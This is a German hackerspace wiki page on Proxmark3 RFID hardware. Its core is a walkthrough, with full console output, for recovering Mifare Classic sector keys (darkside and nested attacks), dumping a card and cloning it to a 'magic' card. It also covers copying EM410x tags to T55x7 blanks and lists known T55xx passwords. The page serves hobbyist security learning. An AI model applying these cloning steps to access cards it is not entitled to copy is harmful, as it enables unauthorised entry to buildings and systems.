= Proxmark3
Dank Jan haben wir einen wir einen proxmark3, ein Proxmark3 easy und auch 2 Chameleons,
Der RFID Koffer mit dem Zeugs, auch Karten etc. gibt es auf Anfrage bei mir
Der Proxmark 3 easy hat momentan Probleme mit Legic Prime, muss noch debugt werden.
Auf dem DL0MUC-Rechner ist die dazu passende Software installiert, Mus man mal (tm) updaten.
= Mifare todo bei Jan
Auf dem 34c3 haben wir damit mal weiter rumgespielt, hier noch ein paar Tips
(Bin selber zu faul das immer wieder raus zu suchen)
* Welcher Kartentyp
hf search
* Check für Standardkeys
hf mf chk *1 ?
== Mifare Cloning
* Einen gültigen Key herausfinden
proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average :-)
Press the key on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------
........................
uid(352c1f4c) nt(b30c6cee) par(ba92426af29a2a32) ks(0008090f0e0f070d) nr(00000000)
|diff|{nr} |ks3|ks3^5|parity |
+----+--------+---+-----+---------------+
| 00 |00000000| 0 | 5 |0,1,0,1,1,1,0,1|
| 20 |00000020| 8 | d |0,1,0,0,1,0,0,1|
| 40 |00000040| 9 | c |0,1,0,0,0,0,1,0|
| 60 |00000060| f | a |0,1,0,1,0,1,1,0|
| 80 |00000080| e | b |0,1,0,0,1,1,1,1|
| a0 |000000a0| f | a |0,1,0,1,1,0,0,1|
| c0 |000000c0| 7 | 2 |0,1,0,1,0,1,0,0|
| e0 |000000e0| d | 8 |0,1,0,0,1,1,0,0|
key_count:1
------------------------------------------------------------------
Key found:e251a9da734d
Found valid key:e251a9da734d
proxmark3>
* Mit dem oben gefundenen Key, die ganzen restlichen Keys herausfinden (dauert ein bisschen)
proxmark3> hf mf nested 1 0 A e251a9da734d d
--block no:00 key type:00 key:e2 51 a9 da 73 4d etrans:0
Block shift=0
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:352c1f4c len=2 trgbl=0 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=8 trgkey=0
Found valid key:06930625f573
-----------------------------------------------
uid:352c1f4c len=2 trgbl=8 trgkey=1
Found valid key:9aeb465f44c9
-----------------------------------------------
uid:352c1f4c len=2 trgbl=12 trgkey=0
Found valid key:3ed2990cc0c3
-----------------------------------------------
uid:352c1f4c len=2 trgbl=12 trgkey=1
Found valid key:f9e3c2b9421a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=16 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=16 trgkey=1
Found valid key:f18ea2dcca6f
-----------------------------------------------
uid:352c1f4c len=2 trgbl=20 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=20 trgkey=1
Found valid key:6f259862ef91
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=0
Found valid key:f0bf64a6bf6a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=28 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=28 trgkey=1
Found valid key:59039bbc5f20
-----------------------------------------------
uid:352c1f4c len=2 trgbl=32 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=32 trgkey=1
Found valid key:59039bbc5f20
-----------------------------------------------
uid:352c1f4c len=2 trgbl=36 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=36 trgkey=1
Found valid key:d412a41ecb09
-----------------------------------------------
uid:352c1f4c len=2 trgbl=40 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=40 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=44 trgkey=0
Found valid key:d271ff53eeda
-----------------------------------------------
uid:352c1f4c len=2 trgbl=44 trgkey=1
Found valid key:b6ca78eabb2a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=48 trgkey=0
Found valid key:cb87a64088e7
-----------------------------------------------
uid:352c1f4c len=2 trgbl=48 trgkey=1
Found valid key:0653bf2b8701
-----------------------------------------------
uid:352c1f4c len=2 trgbl=52 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=52 trgkey=1
Found valid key:541550280d7e
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=60 trgkey=0
Found valid key:f0bf64a6bf6a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=60 trgkey=1
Found valid key:59039bbc5f20
-----------------------------------------------
uid:352c1f4c len=2 trgbl=0 trgkey=1
Found valid key:322c9cbbe53f
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=0
Found valid key:9c8c07c9f190
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=16 trgkey=0
Found valid key:5ed4f3654421
-----------------------------------------------
uid:352c1f4c len=2 trgbl=20 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=28 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=32 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=36 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=40 trgkey=0
Found valid key:9dec238a9214
-----------------------------------------------
uid:352c1f4c len=2 trgbl=40 trgkey=1
Found valid key:bd451e445aed
-----------------------------------------------
uid:352c1f4c len=2 trgbl=52 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=0
Found valid key:472a6f5519ad
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=20 trgkey=0
Found valid key:cfea5408a6da
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=28 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=32 trgkey=0
Found valid key:f0bf64a6bf6a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=36 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=52 trgkey=0
Found valid key:a6d80a83ded6
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=28 trgkey=0
Found valid key:f0bf64a6bf6a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=36 trgkey=0
Found valid key:8f0e6a510598
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=1
Found valid key:f3be399eba7b
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=1
Found valid key:59039bbc5f20
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
Found valid key:5a6041c9f9fc
Time in nested: 37,380 (0,603 sec per key)
-----------------------------------------------
Iterations count: 62
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| e251a9da734d | 1 | 322c9cbbe53f | 1 |
|001| 9c8c07c9f190 | 1 | 5a6041c9f9fc | 1 |
|002| 06930625f573 | 1 | 9aeb465f44c9 | 1 |
|003| 3ed2990cc0c3 | 1 | f9e3c2b9421a | 1 |
|004| 5ed4f3654421 | 1 | f18ea2dcca6f | 1 |
|005| cfea5408a6da | 1 | 6f259862ef91 | 1 |
|006| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 |
|007| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 |
|008| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 |
|009| 8f0e6a510598 | 1 | d412a41ecb09 | 1 |
|010| 9dec238a9214 | 1 | bd451e445aed | 1 |
|011| d271ff53eeda | 1 | b6ca78eabb2a | 1 |
|012| cb87a64088e7 | 1 | 0653bf2b8701 | 1 |
|013| a6d80a83ded6 | 1 | 541550280d7e | 1 |
|014| 472a6f5519ad | 1 | f3be399eba7b | 1 |
|015| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 |
|---|----------------|---|----------------|---|
Printing keys to bynary file dumpkeys.bin...
proxmark3>
* Den Inhalt der Karte unter Zuhilfenahme der gefunden Keys dumpen
proxmark3> hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
proxmark3>
* Den entstandenen Dump ins eml-Format konvertieren (PM3-Scripts sind am Ende der Seite in den Downloads)
user@host:~$ ./pm3_bin2eml.py dumpdata.bin dumpdata.eml
* Das eml-File in eine "Magic Chinese Guy"-Karte laden (diese vorher natürlich auf den proxmark legen!)
proxmark3> hf mf cload dumpdata
Loaded from file: dumpdata.eml
proxmark3>
* Fertig
== EM410x Cloning
* Karte auslesen
proxmark3> lf em4x em410xwatch
#db# buffer samples: d1 cd c5 c0 ba b7 b2 af ...
Reading 16000 samples
Done!
Auto-detected clock rate: 64
EM410x Tag ID: 0101160061
Unique Tag ID: 0808860068
proxmark3>
* UID (hier: EM410x Tag ID) auf Blankokarte (T5555 oder T55x7) schreiben
proxmark3> lf em4x em410xwrite 0101160061 1
Writing T55x7 tag with UID 0x0101160061 (clock rate: 64)
#db# Started writing T55x7 tag ...
#db# Clock rate: 64
#db# Tag T55x7 written with 0xff806018d8003060
* Fertig
== EM410x Known Passwords
0x51243648
0x000D8787
lf t55xx writeblockPWD 00148041 0 51243648
== Downloads
* {{::prox.rar|}} (Quelle: http://www.fuzzysecurity.com/)
* Proxmark-Firmware/Client, etc.: https://code.google.com/p/proxmark3/wiki/Linux
== Jans MAC Debugging
* Homebrew Install (Im Terminal Fenster starten)
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
* Proxmark Install
brew tap proxmark/proxmark3
brew install proxmark3
Momentan kaputt (Stand 15.1.2018) dann mit diesem Parameter Installieren.
brew install --HEAD proxmark3
* TTY Port heraus finden (proxmark3 vorher anschließen)
ls /dev/cu*
* Starten (usbmodem21 wars bei mir, entsprechend anpassen)
proxmark3 /dev/cu.usbmodem21
* Alle proxmark Befehle laufen ab hier ganz normal
== Debugging
=== Make-Fehler unter (u.a.) Ubuntu
Im client/Makefile dashier ändern:
CXXFLAGS = $(shell pkg-config --cflags QtCore QtGui 2>/dev/null) -Wall -O4
QTLDLIBS = $(shell pkg-config --libs QtCore QtGui 2>/dev/null)
MOC = /usr/lib/x86_64-linux-gnu/qt4/bin/moc